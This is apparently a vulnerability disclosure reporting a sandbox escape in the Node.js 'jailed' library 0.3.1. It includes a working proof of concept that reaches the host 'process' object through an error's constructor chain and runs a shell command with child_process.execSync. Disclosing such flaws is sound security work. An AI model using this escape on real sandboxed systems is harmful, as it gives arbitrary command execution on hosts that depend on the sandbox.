Sandbox Escape Bug in jailed with Node.js

[seongil-wi]

• Jailed version: 0.3.1

• Node version: 18.15.0

• run-jailed.js

  var jailed = require('jailed');
  var api = {};
  var plugin = new jailed.Plugin('./test_case.js', api);

• test_case.js

  
  try{ 
  propertyIsEnumerable.call(undefined,);
  } catch (pp) {  
  pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
  }

application.disconnect();

Sandbox can be escaped by calling `propertyIsEnumerable.call` function.
Also, we can execute arbitrary shell code using process module.